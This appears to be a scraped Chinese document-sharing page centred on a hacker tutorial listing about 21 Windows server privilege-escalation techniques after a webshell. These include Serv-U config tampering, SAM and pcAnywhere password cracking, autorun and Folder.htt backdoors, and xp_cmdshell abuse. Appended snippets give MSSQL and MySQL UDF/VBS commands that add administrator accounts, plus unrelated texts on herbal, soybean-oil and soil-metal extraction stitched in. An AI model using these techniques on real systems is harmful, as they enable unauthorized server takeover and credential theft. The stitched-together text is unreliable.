文档库 最新最全的文档下载
当前位置:文档库 › 21种方法提权

21种方法提权

21种方法提权
21种方法提权

权限提升21大法!

cacls提权

cacls d:\website /r everyone /e /t 取消其他用户对此目录的访问权限

cacls d:\website /g everyone:f /e /t 授予此用户对该目录的完全控制权限

1.radmin连接法

条件是你权限够大,对方连防火墙也没有。封装个radmin上去,运行,开对方端口,然后radmin上去。本人从来米成功过。,端口到是给对方打开了。

2.pcanywhere

C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 这里下他的GIF

文件,在本地安装pcanywhere上去

3.SAM破解

C:\WINNT\system32\config\ 下他的SAM 破解之

4.SU密码夺取

C:\Documents and Settings\All Users\「开始」菜单\程序\

引用:Serv-U,然后本地查看属性,知道路径后,看能否跳转

进去后,如果有权限修改ServUDaemon.ini,加个用户上去,密码为空

[USER=WekweN|1]

Password=

HomeDir=c:\

TimeOut=600

Maintenance=System

Access1=C:\|RWAMELCDP

Access1=d:\|RWAMELCDP

Access1=f:\|RWAMELCDP

SKEYvalues=

这个用户具有最高权限,然后我们就可以ftp上去quote site exec xxx 来提升权限

5.c:\winnt\system32\inetsrv\data\

引用:就是这个目录,同样是erveryone 完全控制,我们所要做的就是把提升权限的工具上传上去,然后执行

6.SU溢出提权

这个网上教程N多不详细讲解了

7.运行Csript

引用:运行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"来提

升权限

用这个cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps

查看有特权的dll文件:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll

再将asp.dll加入特权一族

asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的机子放的位置不一定一样)

我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll"

"C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32

\inetsrv\asp.dll"

可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去了

8.脚本提权

c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写入bat,vbs

9.VNC

这个是小花的文章HOHO

默认情况下VNC密码存放在HKCU\Software\ORL\WinVNC3\Password

我们可以用vncx4

破解它,vncx4使用很简单,只要在命令行下输入

c:\>vncx4 -W

然后顺序输入上面的每一个十六进制数据,没输完一个回车一次就行了。

10.NC提权

给对方来个NC 但是条件是你要有足够的运行权限然后把它反弹到自己的电脑上HOHO OK了

11.社会工程学之GUEST提权

很简单查看他的拥护一般来说看到帐户以后密码尽量猜可能用户密码一样也可能是他QQ号邮

箱号手机号尽量看看HOHO

12.IPC空连接

如果对方真比较白痴的话扫他的IPC 如果运气好还是弱口令

13.替换服务

这个不用说了吧?个人感觉相当复杂

14.autorun .inf

autorun=xxx.exe 这个=后面自己写HOHO 加上只读、系统、隐藏属性传到哪个盘都可以的不相信

他不运行

15.desktop.ini与Folder.htt

引用:首先,我们现在本地建立一个文件夹,名字不重要,进入它,在空白处点右键,选择"自定义

文件夹"(xp好像是不行的)一直下点,默认即可。完成后,你就会看到在此目录下多了两个名为Folder setting的文件架与desktop.ini的文件,(如果你看不到,先取消"隐藏受保护的操作系统文件")然后

我们在Folder setting目录下找到Folder.htt文件,记事本打开,在任意地方加入以下代码:

ID="RUNIT" WIDTH=0 HEIGHT=0 TYPE="application/x-oleobject" CODEBASE="你的后门文件名">

然后你将你的后门文件放在Folder setting目录下,把此目录与desktop.ini一起上传到对方

任意一个目录下,就可以了,只要等管理员浏览了此目录,它就执行了我们的后门

16.su覆盖提权

本地安装个su,将你自己的ServUDaemon.ini文件用从他那下载下来的ServUDaemon.ini 覆盖掉,重

起一下Serv-U,于是你上面的所有配置都与他的一模一样了

17.SU转发端口

43958这个是Serv -U 的本地管理端口。FPIPE.exe上传他,执行命令:Fpipe –v –l 3333 –r

43958 127.0.0.1 意思是将4444端口映射到43958端口上。然后就可以在本地安装一个Serv-u,新建一个服务器,IP填对方IP,帐号为LocalAdministrator 密码为#1@$ak#.1k;0@p 连接上后你就可以管理他的Serv-u了

18.SQL帐户密码泄露

如果对方开了MSSQL服务器,我们就可以通过用SQL连接器加管理员帐号(可以从他的连接数据库的ASP文件中看到),因为MSSQL是默认的SYSTEM权限。

引用:对方没有删除xp_cmdshell 方法:使用Sqlexec.exe,在host 一栏中填入对方IP,User与Pass

中填入你所得到的用户名与密码。format选择xp_cmdshell"%s"即可。然后点击connect,连接上后就可

以在CMD一栏中输入你想要的CMD命令了

19.asp.dll

引用:因为asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的机子放的位置不一定相同

)

我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll"

"C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll"

"C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32

\inetsrv\asp.dll"

好了,现在你可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去

了,注意,用法中的get和set,一个是查看一个是设置.还有就是你运行上面的你要到

C:\Inetpub\AdminScripts>这个目录下.

那么如果你是一个管理员,你的机子被人用这招把asp提升为system权限,那么,这时,防的方法就是把asp.dll T出特权一族,也就是用set这个命令,覆盖掉刚才的那些东东.

20.Magic Winmail

最全的WEBSHELL提权大大全

WEBSHELL权限提升技巧 c: d: e:..... C:\Documents and Settings\All Users\「开始」菜单\程序\ 看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径, C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,破解得到pcAnywhere 密码,登陆 c:\Program Files\serv-u\ C:\WINNT\system32\config\ 下它的SAM,破解密码 c:\winnt\system32\inetsrv\data\ 是erveryone 完全控制,很多时候没作限制,把提升权限的工具上传上去,然后执行 c:\prel C:\Program Files\Java Web Start\ c:\Documents and Settings\ C:\Documents and Settings\All Users\ c:\winnt\system32\inetsrv\data\ c:\Program Files\ c:\Program Files\serv-u\ C:\Program Files\Microsoft SQL Server\ c:\Temp\ c:\mysql\(如果服务器支持PHP) c:\PHP(如果服务器支持PHP) 运行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"来提升权限 还可以用这段代码试提升,好象不是很理想的 如果主机设置很变态,可以试下在c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写入bat,vbs等木马。 根目录下隐藏autorun.inf C:\PROGRAM FILES\KV2004\ 绑 D:\PROGRAM FILES\RISING\RAV\ C:\Program Files\Real\RealServer\ rar Folder.htt与desktop.ini 将改写的Folder.htt与desktop.ini,还有你的木马或者是VBS或者是什么,放到对方管理员最可能浏览的目录下 replace 替换法捆绑 脚本编写一个启动/关机脚本重起 删SAM 错 CAcls命令 FlashFXP文件夹Sites.dat Sites.dat.bak Stats.dat Stats.dat.bak Ring的权限提升21大法! 以下全部是本人提权时候的总结很多方法至今没有机会试验也没有成功,但是我是的确看见别人成功过

中药提取方法

综述中药提取方法 摘要以中药提取方法的本质与影响提取作业的因素为理据,分析国内中药厂提取方法 关键词中药提取方法 1前沿 近年来有关中药提取方法的论述有很多,然而有效成分的提取率仍然就是现今国内中药制药工业现代化的瓶颈。尽管近年来国内在中药提取生产中推出了一些新工艺,如超声场强化提取、微波提取、超临界流体提取等,但当下的主流仍就是浸提技术。浸提技术就是应用溶剂提取固体原料中某一或某类成分的提取分离操作,又称固液萃取。目前在中药生产过程中,常用的中药浸提方法有煎煮法、浸渍法、渗漉法、回流法、水蒸气蒸馏法等。 面对众多中药提取方法如何抉择就是一个复杂的问题,因为它牵涉到生产设备与生产条件等许多因素。加上如今中药提取的规模较大,尤其考虑到连续生产,即使在实验中取得成果,在实际情况下还要经过长时间的实践检验。还有前面提到过的提取新工艺,其提取物往往就是化学结构明确的物质,与传统中药生产完全就是两回事,所以生产传统中药的厂家下不了决心去尝试新工艺,生产者情愿随大流,以避免风险。 提取方法的不同,提取等量有效成分所需原料与能源也

不尽相同,资源与能源对世界经济与人类生存环境的影响越来越被重视。可持续发展经济与资源节约型社会的概念已经被全世界广泛认同,中国也不例外。在市场竞争激烈异常的今天,生产成本的控制就就是企业的生命,而对世界能源价格上涨的现实,生产者应该节约每一滴水,每一度电。中药生产厂家必须努力挑选出最好的中药提取方法,改变目前中药提取效率低、高能耗、高污染所造成的负面影响。 2选择原则 与所有的工程项目一样,选择中药提取方法必要考虑的条件也就是:被处理物料的性质、数量,产品的价值操作人员的技术水平,现实的设备安装场地,生产成本的控制,投资的预算。所追求的目标也就是最高的投资回报率,最低的能耗,最简单的操作,最理想的提取率。降低生产成本,提高产品质量,从而提升本企业的市场竞争力。舍此不会有 良好的后果。 3中药提取本质 中药提取本质上就是一种固液萃取作业,任何化工原理教科书与化工手册对固液萃取的机理都有详尽的阐明。为了便于分析国内中药厂现有提取装置的状况,有必要将其与中药提取有关的结论摘录于此。

1433口令提权详细过程及错误修复

前段时间我朋友给我一个sopo的软件,说是扫1433口令的,而且猜解速度很快,我就找个服务器试了试,确实不错能扫到一些比较强点的口令。所以这段时间就玩了一下1433错误的恢复和提权。(有人可能会说了,这有啥好研究的,sa的权限直接加用户到超管不就成了吗。其实在sa权限下还是有很多的问题的大家可以捡有用的看没用的就略过吧) 下面来说sa下执行命令错误的几种情况: 1、无法装载DLL xpsql70.dll或该DLL所引用的某一DLL。原因126(找不到指定模块。) 这种情况比较常见的,修复起来说简单也简单,但是有条件的。这种情况要是能列出目录(用sqltools v2.0就有列目录功能)恭喜你这个有80%的情况能修复了,如果能列目录,那么只要找到xplog70.dll的路径执行以下命令就可以了。 第一步 exec sp_dropextendedproc 'xp_cmdshell' (这个命令就是删除原有的cmdshell,因为已经出错了) 第二步 dbcc addextendedproc (“xp_cmdshell”,“c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll”) ;EXEC sp_configure 'show advanced options', 0 – 当然这是sql命令,用查询分析器执行。第二步里的c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll就是xplog70.dll的路径,这个路径是比较常见的,如果c盘没有可以找找其他盘符。 2、无法在库xpweb70.dll 中找到函数xp_cmdshell。原因:127(找不到指定的程序。) 其实这个跟上面的126是一样的就是cmdshell出错了只要找到备份的xplog70.dll按照上面的方法就能修复了。 3、未能找到存储过程‘masterxpcmdshell' 这种情况我看到网上的方法是: 第一步先删除: drop procedure sp_addextendedproc

1433提权全教程

1433端口提权的过程 随着网络安全意识的提高,很多服务器的安全防范都非常严了,本人对web入侵是一巧不通就只会扫扫1433弱口令的服务器,于是研究一段时间,虽然进步不大,但是还是想把经验分享一下,正所谓授人以鱼不如授人以渔,而我现在正是告诉你打鱼的方法,下面就以一台服务器为例了,本例使用工具为SQL TOOLS 2.0,论坛有下,请自行搜索。插播不是广告的广告:该工具集成度高,简单的sql指令无须使用分离器,直接在此工具中执行即可,其文件管理功能非常强大,反正我用着太顺手了,推荐一下,本文原创发布于=华夏黑客同盟论坛=(https://www.wendangku.net/doc/45159094.html,)广告完毕。 把扫到的ip和sa及口令填入连接后,用dos命令功能试试列目录 显示错误信息: Error Message:无法装载 DLL xplog70.dll 或该 DLL 所引用的某一 DLL。原因: 126(找不到指定的模块。)。 这种情况大家在提权过程中经验遇到啊,它是由于xplog70.dll这个文件被删除或者做了其他限制,导致出现这个错误的 这个错误的直接后果就是sql数据库的xp_cmdshell的存储过程无法使用,无法执行命令提权自然就无从说起了, 当然我们还可以考虑其他的存储过程如:sp_oacreate和sp_oamethod来直接添加帐号,或者使用沙盘指令来提权, 但这台服务器,这些功能都被限制了,还是考虑下恢复xplog70.dll了,测试上

传无法成功,这条路走不通了, 这时就考虑用到工具的文件管理功能了 看到了把,和windows的资源管理器一样好用,目录列出来了,搜索一下可以用来提权的东西吧,这里我们首先要去看看 sql的安装路径里的xplog70.dll文件是否存在 看到吧,xplog70.dll文件不见了,被删除了,xpweb70.dll也被改了名字了-. - 继续搜寻下其他盘看看还有什么东西

授渔之1433提权全教程

授渔之<一次1433端口提权的过程> 随着网络安全意识的提高,很多服务器的安全防范都非常严了,本人对web入侵是一巧不通就只会扫扫1433弱口令的服务器,于是研究一段时间,虽然进步不大,但是还是想把经验分享一下,正所谓授人以鱼不如授人以渔,而我现在正是告诉你打鱼的方法,下面就以一台服务器为例了,本例使用工具为SQL TOOLS 2.0,论坛有下,请自行搜索。插播不是广告的广告:该工具集成度高,简单的sql指令无须使用分离器,直接在此工具中执行即可,其文件管理功能非常强大,反正我用着太顺手了,推荐一下,本文原创发布于=华夏黑客同盟论坛=(https://www.wendangku.net/doc/45159094.html,)广告完毕。 把扫到的ip和sa及口令填入连接后,用dos命令功能试试列目录 显示错误信息: Error Message:无法装载 DLL xplog70.dll 或该 DLL 所引用的某一 DLL。原因: 126(找不到指定的模块。)。 这种情况大家在提权过程中经验遇到啊,它是由于xplog70.dll这个文件被删除或者做了其他限制,导致出现这个错误的 这个错误的直接后果就是sql数据库的xp_cmdshell的存储过程无法使用,无法执行命令提权自然就无从说起了, 当然我们还可以考虑其他的存储过程如:sp_oacreate和sp_oamethod来直接添加帐号,或者使用沙盘指令来提权, 但这台服务器,这些功能都被限制了,还是考虑下恢复xplog70.dll了,测试上

传无法成功,这条路走不通了, 这时就考虑用到工具的文件管理功能了 看到了把,和windows的资源管理器一样好用,目录列出来了,搜索一下可以用来提权的东西吧,这里我们首先要去看看 sql的安装路径里的xplog70.dll文件是否存在 看到吧,xplog70.dll文件不见了,被删除了,xpweb70.dll也被改了名字了-. - 继续搜寻下其他盘看看还有什么东西

关于mysql提权方法总结

关于mysql提权方法总结 mysql是一种开放源代码的关系型数据库管理系统(rdbms),mysql数据库系统使用 最常用的数据库管理语言--结构化查询语言(sql)进行数据库管理。那么对于mysql提权的方法,站长们是否了解呢?专职优化、域名注册、网站空间、虚拟主机、服务器托管、vps 主机、服务器租用的中国信息港在这里为你做深入探讨! mysql提权总结方法四则 一 UDF提权 这类提权方法我想大家已经知道了,我大致写一下,具体语句如下: 1 create function cmdshell returns string soname 'udf.dll' 2 select cmdshell('net user iis_user 123!@#abcABC /add'); 3 select cmdshell('net localgroup administrators iis_user /add'); 4 select cmdshell('regedit /s d:\web\3389.reg'); 5 drop function cmdshell; 6 select cmdshell('netstat -an'); 二 VBS启动项提权 1 create table a (cmd text); 2 insert into a values ("set wshshell=createobject (""wscript.shell"") " ); 3 insert into a values ("a=wshshell.run (""cmd.exe /c net user iis_user 123!@#abcABC /add"",0) " ); 4 insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators iis_user /add"",0) " ); 5 select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动 \\a.vbs"; 先在webshell里连接上数据库,建立表,将VBS写入表里,然后导入启动项, 如果UDF提权不行的话也可以尝试下这个方法,前提是要有ROOT权限,后面有个,0表示不弹出CMD窗口,安静的运行。 还可以这样写: 1 create table a (cmd BLOB); 2 insert into a values (CONVERT(木马的 16进制代码,CHAR)); 3 select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe' 4 drop table a; 执行前3条语句,就可以将木马写进启动里了,前提是木马一定要是16进制,还有就是路径要是\\,因为windows会自动过滤掉一个\

【法客周年庆】跟着黑客走吃喝全都有,提权 (二)

目录 1、进shell检查权限 (1) 2、扫端口 (1) 3、43958 开了 (2) 4、1433开了得到dbo权限 (2) 5、找到Serv-U目录无法访问 (3) 6、尝试mysql提权 (3) 7、尝试su提权 (4) 8、SU提权 (5) 9、总结 (5) 1、进shell检查权限 首先这个是看到坛子里面的一个求助提权贴提权的,以前在hake发过,但没这么详细 溜达进shell看了下子。。 aspx支持的完好,不过权限还是比较低的。。 IISSPY可以完美跨目录,那么提权还是有大大的希望的。。 2、扫端口 127.0.0.1 : 21 ................................. Open 127.0.0.1 : 25 ................................. Open 127.0.0.1 : 80 ................................. Open 127.0.0.1 : 110 ................................. Open 127.0.0.1 : 1433 ................................. Open 127.0.0.1 : 1723 ................................. Close 127.0.0.1 : 3306 ................................. Open 127.0.0.1 : 3389 ................................. Open 127.0.0.1 : 4899 ................................. Close 127.0.0.1 : 5631 ................................. Close 127.0.0.1 : 43958 ................................. Open 127.0.0.1 : 65500 ................................. Close

获得网站WEBSHELL权限的截图0

获得网站WEBSHELL权限 一、学习目标:在得到了管理员帐号的情况下,进入网站的管理员后台,以备份数据库得到WEBSEHLL。 二、知识要点:在入侵网站之前,信息搜集是第一步,任何情况的搜集,当情况搜集有初步成果之后,应该首先试图获得管理员的帐号和密码,然后找出网站的后台(看管理员在后台的什么地方),对于现成的整站系统而言,通常后台是固定的,只要搞到网站就能以管理员的帐号进入。进了后台,就有了能力对网站进行操作,我们就有了很大的把握获得的一个WEBSEHLL。所谓WEBSEHLL,也就是一个脚本,这个脚本,具有可以管理WEB、修改主页内容的权限,如果要修改别人的主页,一般都需要这个权限(上传漏洞要得到的也是这个权限)。它可对网站的任何文件进行编辑,移动,复制,删除。如果某个服务器权限设置得不好,那么通过webshell可以得到该服务器的最高权限----即可以得到的是整个网站的操作权限,并且是进一步渗透获得主机权限的立脚点。 在进入管理后台后,获得WEBSHELL的首选方法是通过"备份数据库"的方法上传一个扩展名改成GIF的ASP木马,(之所以要把ASP的木马护展名由ASP改为GIF,是因为一般网站都有检测护展名,当检测到护展名为ASP时就不会允许上传),上传之后,用备份数据库的办法,把GIF护展名,备份成为ASP护展名,然后连接备份后的ASP地址,就能打开你上传的ASP木马,一个WEBSEHLL就到手了。具体方法为在备份数据库地址里输入你上传的GIF文件的相对地址,在恢复地址里输入你要生成的ASP地文件的路径和文件名,然后恢复数据库即可。 三、实验步骤 1、IE浏览器中输入https://www.wendangku.net/doc/45159094.html,/bbsxp1(之前已经通过某方法得到网站后台管理员的用户名、口令)。 (1)以管理员身份登录网站前台,如图1。 图1 (2)在图2界面中进入ACCESS数据库管理,并在图3界面中输入后台管理员密码完成登录。

改进的BCR连续提取法详细实验流程

改进的BCR重金属形态提取方法 试剂配制:所用的药品必须是分析纯以上。 溶液A 0.11mol/L冰乙酸(HOAc,0.11mol/L): 用移液枪吸取6.32 mL冰醋酸到1L的容量瓶中,再用去离子水定容。获得溶液A。(12.64 mL冰醋酸到2L的容量瓶中) 溶液B 0.5 mol/L盐酸羟胺(NH2OH·HCl,0.5 mol/L):溶解34.75g的NH2OH·HCl到400mL的去离子水中。转移溶液至1L容量瓶中,再加入25mL的2 mol/LHNO3(或3.125 mL浓HNO3)到1L容量瓶中,最后用去离子水定容。该溶液要当天使用当天配。(溶解69.49g NH2OH?HCl,加入6.25mL浓HNO3到2L的容量瓶中) 溶液C30%过氧化氢(H2O2,300mg/g,8.8 mol/L):使用由厂家提供的H2O2(用硝酸调节至pH稳定在2-3)即可。 溶液D 1 mol/L乙酸铵(NH4OAc,1 mol/L): 溶解77.08g的NH4OAc到800mL的去离子水中。再用一定浓度的HNO3调节pH到2.0±0.1,最后用去离子水定容。(154.16g-2L)注意事项: 1.所有用来盛放样品或反应物的容器及配置溶液的容量瓶和烧杯都 要用20% HNO3浸泡过夜,然后用去离子水清洗3遍以上。注意每批样品至少设置2个空白及两个标准品(BCR法)GBW07437进行质量控制。 2.第3步中每次添加完过氧化氢溶液或加热时,盖上盖子但不要拧 紧,前15min要格外小心,避免大量气体产生溢出损失样品。

改进的BCR连续提取法包含四个步骤,其详细流程如下: 第1步(弱酸提取态):用精确度0.0001g的分析天平准确称取过100目筛的风干土壤样品0.5000-0.5010g放入50ml泡酸清洗过的离心管中,加入20mL 0.11mol/L 的CH3COOH溶液,(在添加浸提液和开始振荡这段时间不要耽搁太久)22±5℃下30±10 rpm振荡16小时,静置3-5分钟后轻摇离心管使管壁的所有样品均进入溶液中,然后以4000rpm的转速离心15min。将上清液移入50mL泡酸清洗过的聚乙烯瓶中,于4℃条件下保存、待测。往残余物中加入15mL去离子水,振荡15分钟,静置3-5分钟后轻摇离心管使管壁的所有样品均进入溶液中,以4000rpm的转速离心15min,小心弃去上清液。 第2步(可还原态):向上一步提取后的剩余沉积物样品中加入现配的20mL 0.5mol/L的(NH2OH·HCl)盐酸羟胺溶液(该溶液要现配现用,2mol/L HNO3酸化,pH 1.5),22±5℃下振荡16小时,静置3-5分钟后轻摇离心管使管壁的所有样品均进入溶液中,然后以4000rpm的转速离心15min。将上清液移入50ml 泡酸清洗过的聚乙烯瓶中,于4℃条件下保存、待测。往残余物中加入15mL去离子水,振荡15分钟,静置3-5分钟后轻摇离心管使管壁的所有样品均进入溶液中,以4000rpm的转速离心15min,小心弃去上清液。 第3 步(可氧化态):分步向上一步提取后的剩余样品中加入5mL 8.8mol/ml的双氧水原液(pH值2-3),盖上盖子但不要拧紧,利用振荡器间歇5min摇动离心管,在室温下消化1小时,然后将其移至水浴锅中,于85±2℃下消化1小时(前半小时要间歇性的进行手摇振荡以防止样品溢出),打开离心管盖,继续在85±2℃下加热至管内溶液剩余3mL以下。再加入5mL双氧水原液,在85±2℃下继续加热至溶液近干(1mL以下)。待离心管冷却后,加入20mL 1mol/L pH 值为2.0的乙酸铵溶液(浓HNO3酸化pH 2.0),22±5℃下振荡16小时,静置3-5分钟后轻摇离心管使管壁的所有样品均进入溶液中,然后以4000rpm的转速离心15min。将上清液移入50ml 泡酸清洗过的聚乙烯瓶中,于4℃条件下保存、待测。往残余物中加入15mL去离子水,振荡15分钟,静置3-5分钟后轻摇离心管使管壁的所有样品均进入溶液中,以4000rpm的转速离心15min,小心弃去上清液。 第4步(残渣态):借助漩涡震荡仪用6mL浓HNO3分两次(每次3mL)洗出离心管中剩余的样品到聚四氟乙烯消煮管,再先后用2mL HF和3mL HCl将离心管剩余残渣洗涤后转移至消煮管中,用微波消解仪对土壤进行消解后,赶酸至消煮管中剩余液体体积如黄豆大小,然后借助旋涡震荡仪用1%HNO3洗涤消煮管,液体转移至聚乙烯瓶定容到25mL。 第5步(总量):准确称取过100目筛的风干土壤样品0.500g,加入6mL HNO3 2mLHF和3mL HCl,用微波消解仪对土壤进行消解后,赶酸至消煮管中剩余液体体积如黄豆大小,然后借助旋涡震荡仪用1%HNO3洗涤消煮管,液体转移至聚乙烯瓶定容到25mL。

九种经典的Webshell提权

说到花了九牛二虎的力气获得了一个webshell, 当然还想继续获得整个服务器的admin权限,正如不想得到admin的不是好黑客~ 嘻嘻~~好跟我来,看看有什么可以利用的来提升权限 第一 如果服务器上有装了pcanywhere服务端,管理员为了管理方便 也给了我们方便,到系统盘的Documents and Settings/All Us ers/Application Data/Symantec/pcAnywhere/中下载*.cif本地 破解就使用pcanywhere连接就ok了 第二 有很多小黑问我这么把webshell的iis user权限提升 一般服务器的管理都是本机设计完毕然后上传到空间里, 那么就会用到ftp,服务器使用最多的就是servu 那么我们就利用servu来提升权限 通过servu提升权限需要servu安装目录可写~ 好开始把,首先通过webshell访问servu安装文件夹下的ServUDaemon.ini把他下载下来,然后在本机上安装一个servu把ServUDaemon.ini放到本地安装文件夹下覆盖,启动servu添加了一个用户,设置为系统管理员,目录C:\,具有可执行权限 然后去servu安装目录里把ServUDaemon.ini更换服务器上的。 用我新建的用户和密码连接~ 好的,还是连上了 ftp ftp>open ip Connected to ip. 220 Serv-U FTP Server v5.0.0.4 for WinSock ready... User (ip:(none)): id //刚才添加的用户 331 User name okay, please send complete E-mail address as password. Password:password //密码 230 User logged in, proceed. ftp> cd winnt //进入win2k的winnt目录 250 Directory changed to /WINNT ftp>cd system32 //进入system32目录 250 Directory changed to /WINNT/system32 ftp>quote site exec net.exe user rover rover1234 /add //利用系统的net.exe 文件加用户。 如果提示没有权限,那我们就 把后门(server.exe)传他system32目录 然后写一个VBs教本 set wshshell=createobject ("wscript.shell") a=wshshell.run ("cmd.exe /c net user user pass /add",0) b=wshshell.run ("cmd.exe /c net localgroup Administrators user /add",0) b=wshshell.run ("cmd.exe /c server.exe",0)

浸出法制取大豆油

浸出法制取大豆油 发布者:acr 发布时间:2009-7-22 阅读:1 027次 浸出法制油是目前世界上先进的取油技术。自1870年间世以来,经过了百余年的历史,其工艺不断得到改进和完善,到目前为止,已成为世界油脂工业中植物油制取的主要方式。 (一)浸出法制油的基本原理及要素 浸出法制油是利用能溶解油脂的溶剂,通过润湿渗透、分子扩散和对流扩散的作用,将料胚中的油脂浸提出来,然后把由溶剂和脂肪所组成的混合油进行分离,回收溶剂而得到毛油,同样也要将豆粕中的溶剂回收,得到浸出粕。这个过程中,基本要素是溶剂和料胚以及决定浸出效果的浸出方式和工艺参数。 1.溶剂的选择 理想的浸出溶剂应符合以下基本要求: ①能在室温或低温下以任何比例溶解油脂; ②溶剂的选择性要好,即除油脂外,不溶解其它成分。 ③化学性质稳定,对光和水具稳定性,经加热、蒸发与冷却不起化学变化。 ④要求溶剂沸点低,比热小和汽化潜热小,易从粕和油中分离回收。 ⑤溶剂本身无毒性,呈中性,无异味,不污染。 ⑥溶剂与油、粕和设备材料均不发生化学反应。 我国制油工业实际生产中应用最普遍的浸出溶剂有工业已烷或轻汽油等几种脂肪 族碳氢化合物。其中轻汽油是我国目前应用最多的一种溶剂,它是石油原料低沸点分馏产物,符合溶剂上述的基本要求。但最大缺点是易燃易爆,空气中含量达到1.25~4.9%时,有爆炸危险。同时,轻汽油成分复杂,沸点范围较宽。 除此之外,还有丙酮、丁酮、异丙醇、丁烷以及一些复合型溶剂都可用于油脂浸出,有些已在研究试用。 2.对料胚的要求 大豆原料经过预处理,应使其料胚的结构与性质满足浸出工艺要求,才会获得好的浸出效果。 ①细胞破坏程度越彻底越好。 ②料胚薄而结实,粉末度小。这样浸出距离短,溶剂与料胚接触面积大,有利于提高浸效率。大豆直接浸出法要求料胚厚度0.2~0.3mm。 ③水分适宜,浸出溶剂不溶于水,如果料胚中水分高了,内部空隙充满水分, 就会影响到溶剂的渗透和对油脂的溶解作用。所以料胚水分宜低。(<13%,5~7%) ④适当的温度,料胚温度高,油脂粘度低,容易流动,浸出效果好,但应注意,料胚温度不宜超过溶剂的沸点,以免使溶剂汽化。所以料胚温度一般控制在45~55℃,不宜超过60℃。 (二)、浸出制油工艺 1.常规工艺总体流程 一个完整的浸出工艺包括溶剂浸出,混合油分离、湿粕脱溶烘干以及溶剂回收等工序。 浸出法工艺流程图

MSSQL 通过存储过程调用WEB服务解决方法

MSSQL 通过存储过程调用WEB服务解决方法 在数据库的脚本开发过程中,由于需要及时的通过服务中网站中获取及时信息,比如:输入身份证查询考试成绩,输入身份证查询医保卡信息等;SQLSERVER中存储过程来调用外部服务,但是此服务需要sysadmin角色权限。 以下为配置的要求以及源代码: 1, 环境需求设置 开通’ sys.sp_OACreate’以及'Ole Automation Procedures'访问设置: 如果要是SQLSERVER里面实现调用WEB服务、操作文件等相关操作,需通过SQLSERVER的自带组建Ole Automation Procedures,默认情况下这个组件是禁止的。 SQL Server阻止了对组件'Ole Automation Procedures'的过程'sys.sp_OACreate'的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure启用'Ole Automation Procedures'。有关启用'Ole Automation Procedures'的详细信息,请参阅SQL Server联机丛书中的"外围应用配置器"。语句已终止。 Ole Automation Procedures选项 使用Ole Automation Procedures选项可指定是否可以在Transact-SQL批处理中实例化OLE Automation对象。也可以使用外围应用配置器工具来配置此选项。有关详细信息,请参阅外围应用配置器。 可以将Ole Automation Procedures选项设置为以下值。 禁用OLE Automation Procedures。SQL Server 2005新实例的默认值。 1 启用OLE Automation Procedures。

重金属形态浸提方法

重金属试验所用到的浸提方法 整理:syl1204 植物样品(根、茎叶、面粉、猪粪样品)重金属全量测定方法: 样品室温下风干,烘干磨细,准确称取0.2500-0.5000g准确0.0001到特芙蓉消煮管,加入5-8ml硝酸和1-3ml过氧化氢消煮,先将温度调到80℃,1.5h;然后调到130℃,2.5h之后,打开盖子赶酸,至含珠状,即粘稠不动,加超纯水使之全部溶解,冲洗内壁,定容至50ml的容量瓶中,过滤,测重金属含量。 土壤样品测定方法(用提取剂提取后,提取液中盐分可能很高,最好稀释后再上机测试,不然会造成仪器进样管堵塞,同时测试时候,测一个样,进样管要在水中多停留一段时间清洗盐分): 1.水提法:取2g过10目筛的盆栽土加入离心管中,再加20ml去离子水, 震荡2h后,4000r/min离心10分钟,过滤,然后AAS法测定Cu含量。 2.DTPA浸提方法(中性-碱性土): 1.967g DTPA(三乙三胺五乙酸)溶于14.92g TEA(三乙醇胺)和少量水中, 再将1.47gCaCl 2·2H 2 O(或1.1098g无水CaCl 2 )溶于水后,一并转入1L容量瓶 中,加水至约950mL,再用6mol/L HCl(即v/v=1/1)溶液调节至pH7.30,最后加水定容,贮于塑料瓶中备用(几个月内不变质). 通过1mm筛的风干土10.00g放入100mL塑料广口瓶中,加DTPA提取剂(其成分为:0.005mol·L-1DTPA—0.01mol·L-1 CaCl2和0.1mol·L-1 TEA,pH=7.3)20.0mL,25℃下180±20r/min振荡2h,过滤。滤液、空白溶液和标准溶液中的Zn、Cu用原子吸收分光光度计测定(最好在48h内完成测试)。 0.1M HCl(酸性土):吸取8.3ml优级纯HCl加水至1L(土:液=1:10). M3提取剂(不分酸碱性):称取20.0g NH4NO3(AR),将其溶于约500ml 水中,加4.00ml NH4F(有毒,腐蚀玻璃)-EDTA储备液,混匀后再加入11.50ml 